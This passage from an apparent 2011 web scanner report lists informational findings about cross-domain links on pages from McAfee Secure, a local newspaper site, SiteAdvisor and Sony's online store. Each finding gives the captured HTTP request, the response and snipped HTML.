Cache-Control: no-cache
Set-Cookie: CAMEFROM=www.fingerhut.com
Content-Type: text/html; charset=utf-8
Content-Length: 10809
Connection: close
Date: Mon, 16 May 2011 01:37:34 GMT

<html>
<head>


<script>
function utmx_section(){}function utmx(){}
(function(){var k='1568676568',d=document,l=d.location,c=d.cookie;fun
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="https://images.scanalert.com/css/rating-verify.css">
</head>
...[SNIP]...
</script>
<script language='javascript' src='https://server.iad.liveperson.net/hc/10599399/x.js?cmd=file&file=chatScript3&site=10599399&imageUrl=https://images.scanalert.com/images/liveperson/set03'> </script>
...[SNIP]...

22.65. https://www.mcafeesecure.com/us/legalinfo.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mcafeesecure.com
Path:	/us/legalinfo.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://www.mcafeesecure.com/us/legalinfo.jsp?domain=www.fingerhut.com

The response contains the following link to another domain:

https://images.scanalert.com/meter/www.mcafeesecure.com/13.gif?lang=EN

Request

GET /us/legalinfo.jsp?domain=www.fingerhut.com HTTP/1.1
Host: www.mcafeesecure.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405.1305377534.1.1.utmcsr=server.iad.liveperson.net|utmccn=(referral)|utmcmd=referral|utmcct=/hcp/integration/hackersafe/hackersafe-grey.html; CAMEFROM=www.fingerhut.com; resin=1724539402.20480.0000; __utma=185732405.396205410.1305377534.1305377534.1305509530.2; __utmc=185732405; __utmb=185732405.1.10.1305509530; adclick=1002-25

Response

HTTP/1.1 200 OK
Server: McAfeeSecure
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 8707
Connection: close
Date: Mon, 16 May 2011 01:40:26 GMT

<html>
<head>
<style type="text/css">
html,body{color:#4c4d4f;font-size:12px;font-family:verdana;margin:0;padding:0;z-index:0;text-align:center;}
body {background:url('/images/rateverifyin
...[SNIP]...
<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.mcafeesecure.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.mcafeesecure.com/13.gif?lang=EN" alt="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...

22.66. http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.observertoday.com
Path:	/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047

The response contains the following links to other domains:

http://208.15.24.251/vnr/index.asp?publicationID=54
http://analytics.apnewsregistry.com/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A
http://connect.facebook.net/en_US/all.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a71d5be7a6ba8a6
http://s7.addthis.com/static/btn/lg-share-en.gif
http://www.addthis.com/bookmark.php?v=250&pub=xa-4a71d5be7a6ba8a6
http://www.google-analytics.com/urchin.js
http://www.hot-ads.com/browse/index.cfm?SID=NY&RGID=10000000000&CID=31
http://www.savingspirate.com/
http://www.weather.com/weather/local/USNY0400
https://secure.oweb.net/onisubscriptions/subscriptions/subscriptions.asp?publicationID=54

Request

GET /page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047 HTTP/1.1
Host: www.observertoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:19:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
a County, New York , Lake Erie, Jamestown Community College, Dunkirk High School, Cattaraugus Reservation, Dunkirk, Fredonia, Sheridan, Hanover, Forestville, Silver Creek, Angola, Portland," />


   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
   </script>
...[SNIP]...
</span>

   <a href="https://secure.oweb.net/onisubscriptions/subscriptions/subscriptions.asp?publicationID=54" title="Subscribe to The OBSERVER">Subscribe</a> | <a href="http://208.15.24.251/vnr/index.asp?publicationID=54" title="Submit News to The OBSERVER">Submit News</a>
...[SNIP]...
</a> 
           <a href="http://www.savingspirate.com/" >Coupons</a> 
           <a href="http://www.hot-ads.com/browse/index.cfm?SID=NY&RGID=10000000000&CID=31" target="_blank">Classifieds</a>
...[SNIP]...
<li><a href="http://208.15.24.251/vnr/index.asp?publicationID=54" target="_blank">SUBMIT News</a>
...[SNIP]...
</a> |


               <a href="http://www.addthis.com/bookmark.php?v=250&pub=xa-4a71d5be7a6ba8a6" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0px;" class="imgMiddle"/></a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a71d5be7a6ba8a6"></script>
...[SNIP]...
<div class="lic">

               <img src="http://analytics.apnewsregistry.com/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A" alt="" width="1" height="1">
               <a rel="item-license" href="#license-559280" id="license-559280">
...[SNIP]...
</div>
   <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div class="padBtm txtCenter"><a href="https://secure.oweb.net/onisubscriptions/subscriptions/subscriptions.asp?publicationID=54"><strong>
...[SNIP]...
<div id="wx_module">
<a href="http://www.weather.com/weather/local/USNY0400">Dunkirk Weather Forecast, NY</a>
...[SNIP]...
</body>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

22.67. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popularmedia.net
Path:	/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5

Issue detail

The page was loaded from a URL containing a query string:

http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5?redirectUser=false&openPanelOnLoad=false&skipIntroPanel=false

The response contains the following link to another domain:

http://www.adobe.com/products/flashplayer/

Request

Response

22.68. http://www.siteadvisor.com/download/windows.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.siteadvisor.com
Path:	/download/windows.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.siteadvisor.com/download/windows.html?cid=64895

The response contains the following links to other domains:

http://home.mcafee.com/
http://home.mcafee.com/Root/AboutUs.aspx?id=privacy
http://home.mcafee.com/Store/FreeTrial.aspx
http://images.scanalert.com/meter/www.mcafee.com/55.gif?lang=EN
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://us.mcafee.com/root/offer.asp?id=266730&cid=86873
http://www.mcafee.com/us/about/contact/index.html
http://www.mcafee.com/us/about/index.html
https://sadownload.mcafee.com/products/SA/Website/saSetup.exe
https://www.mcafeesecure.com/RatingVerify?ref=www.siteadvisor.com&lang=EN

Request

GET /download/windows.html?cid=64895 HTTP/1.1
Host: www.siteadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1305377672274-New

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:39:27 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 40225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li id="about-nav"><a href="http://www.mcafee.com/us/about/index.html" target="_blank">About McAfee</a>
...[SNIP]...
<li id="contact-nav"><a href="http://www.mcafee.com/us/about/contact/index.html" target="_blank">Contact us</a>
...[SNIP]...

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.siteadvisor.com&lang=EN"><img width="65" height="37" border="1" src="//images.scanalert.com/meter/www.mcafee.com/55.gif?lang=EN" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams." oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;" /></a>
...[SNIP]...
<div class="firstcolumn of-two-dwin-banner" style="float:left;">
<a class="universal-dloadbtn-dl-1" href="http://home.mcafee.com/Store/FreeTrial.aspx" onclick="trackCustomLink(this,'Free Trial')" target="_blank"><span style="color:#AA0828;">
...[SNIP]...
<div class="firstcolumn of-two-dwin-banner" style="float:left;">
<a class="universal-dloadbtn-dl-2" href="http://us.mcafee.com/root/offer.asp?id=266730&cid=86873" onclick="trackCustomLink(this,'SiteAdvisor Plus')" target="_blank"><span style="color:#AA0828;">
...[SNIP]...
<div><a class="dwin-dloadbtn-header" href="https://sadownload.mcafee.com/products/SA/Website/saSetup.exe" onClick="trackDownload(this,'https://sadownload.mcafee.com/products/SA/Website/saSetup.exe')"><span>
...[SNIP]...
<div style="padding-top:10px">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<li><a href="http://home.mcafee.com/Root/AboutUs.aspx?id=privacy" target="_blank">Privacy Policy</a>
...[SNIP]...
<li><a href="http://home.mcafee.com" target="_blank">McAfee Home</a>
...[SNIP]...

22.69. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644780502

The response contains the following links to other domains:

http://ebookstore.sony.com/
http://esupport.sony.com/US/perl/contact-relation.pl?
http://esupport.sony.com/US/perl/index.pl
http://esupport.sony.com/US/perl/model-accessories.pl
http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT
http://nexus2.ensighten.com/sony/Bootstrap.js
http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/
http://products.sel.sony.com/SEL/legal/privacy.html
http://syndication.intel.com/DistributeModule.aspx?id=16972
http://syndication.intel.com/DistributeModule.aspx?id=16974
http://syndication.intel.com/DistributeModule.aspx?id=3692&contentType=0
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.sony.com/
http://www.sony.net/
http://www.sonycreativesoftware.com/
http://www.twitter.com/sonyoutletusa
http://www.youtube.com/user/sonyelectronics
https://forum.sel.sony.com/
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644780502 HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
Cookie: TS5bbf46=7383fa3612712fc2ae9b8567010662f778ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f2909ab541389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb233202c9c4e5eb222f7b4e774115284b9b8efe5667a7cd; mbox=check#true#1305494450|session#1305494389047-605069#1305496250|PC#1305494389047-605069.17#1306704000; s_cc=true; s_visit=1; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":1,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=%2bQPq5Txj0cSj2K9MPHgm6Rb8HNI%3d%0a%3b2011%2d05%2d15+17%3a20%3a03%2e73%5f1305494403722%2d66941%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPVRKIbqMMYxuD%0aoaA6bOthQ6slGtdA5zKliKbgbQb9Z5HHz%2fccln%2fsMfRWku9CoObHeEzUcYMu9buki6yfEb1E%2fw%3d%3d; WC_GENERIC_ACTIVITYDATA=[1077176697%3atrue%3afalse%3a0%3aS8M6cnqRHf96Dmh3XbrqfLKeUOs%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE

Response

HTTP/1.1 200 OK
ntCoent-Length: 101653
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 101653
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:20:41 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<link rel="canonical" href="http://www.sonystyle.com/c/S_NB_SB_BP_Bundles/e
...[SNIP]...

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id=""><a target="3692" href="http://syndication.intel.com/DistributeModule.aspx?id=3692&contentType=0" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=3692&contentType=0','3692','resizable=1,scrollbars=0,width=360,height=220');win.focus();"> Intel® Core™ i7 processors</a>
...[SNIP]...
<p><a target="s16974" href="http://syndication.intel.com/DistributeModule.aspx?id=16974" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=16974','s16974','resizable=1,scrollbars=0,width=700,height=394');win.focus();">Intel® Core™ i5-2410M (2.30 / 2.90GHz)</a>
...[SNIP]...
<p><a target="s16974" href="http://syndication.intel.com/DistributeModule.aspx?id=16974" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=16974','s16974','resizable=1,scrollbars=0,width=700,height=394');win.focus();">Intel® Core™ i5-2410M (2.30 / 2.90GHz)</a>
...[SNIP]...
<p><a target="s16972" href="http://syndication.intel.com/DistributeModule.aspx?id=16972" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=16972','s16972','resizable=1,scrollbars=0,width=700,height=394');win.focus();">Intel® Core™ i7-2620M (2.70 / 3.40GHz)</a>
...[SNIP]...
<p><a target="s16972" href="http://syndication.intel.com/DistributeModule.aspx?id=16972" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=16972','s16972','resizable=1,scrollbars=0,width=700,height=394');win.focus();">Intel® Core™ i7-2620M (2.70 / 3.40GHz)</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast & Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.70. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay?serviceId=8198552921665820080&orderItemId=123237101&installationId=&langId=-1&fromInterstitialPage=true&categoryId=&quantity=1&engraveTextLine2=&orderId=.&engraveTextLine1=&mainItemOrdrItemId=123237086&currentOrderId=72142282&mode=add&redirectToChild=&productId=8198552921666326152&catalogId=10551&skipInterstitialPage=true&omnitureEvents=scAdd&errorURL=InterstitialView&storeId=10151

The response contains the following link to another domain:

https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/OrderItemDisplay?serviceId=8198552921665820080&orderItemId=123237101&installationId=&langId=-1&fromInterstitialPage=true&categoryId=&quantity=1&engraveTextLine2=&orderId=.&engraveTextLine1=&mainItemOrdrItemId=123237086&currentOrderId=72142282&mode=add&redirectToChild=&productId=8198552921666326152&catalogId=10551&skipInterstitialPage=true&omnitureEvents=scAdd&errorURL=InterstitialView&storeId=10151 HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy?catalogId=10551&storeId=10151&langId=-1&partNumber=VPCSB11FXWVGPBPSC24%2fBUNDLE&orderId=.&quantity=1&URL=OrderItemDisplay%3forderId%3d.&mode=add
Cookie: TS5bbf46=b8fba18f1f5a5e109b65064644b856f578ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1; mbox=check#true#1305494532|session#1305494389047-605069#1305496332|PC#1305494389047-605069.17#1306704072; s_cc=true; s_visit=1; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":3,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy","lc":{"d0":{"v":3,"s":false,"e":1}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d

Response

HTTP/1.1 200 OK
ntCoent-Length: 4641
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4641
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:21:37 GMT
Connection: close
Cache-Control: private
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="meta_refresh" ht
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.71. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYCTOProcess

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess?catalogId=10551&storeId=10151&langId=-1&LBomId=8198552921666304162&categoryId=8198552921644768017

The response contains the following links to other domains:

http://ebookstore.sony.com/
http://esupport.sony.com/US/perl/contact-relation.pl?
http://esupport.sony.com/US/perl/index.pl
http://esupport.sony.com/US/perl/model-accessories.pl
http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT
http://nexus2.ensighten.com/sony/Bootstrap.js
http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/
http://pro.sony.com/bbsc/ssr/cat-videorecorders/cat-rechdv/product-SPSDVR10RSEW3/
http://pro.sony.com/bbsc/ssr/product-SPSCAM10RSEW3/
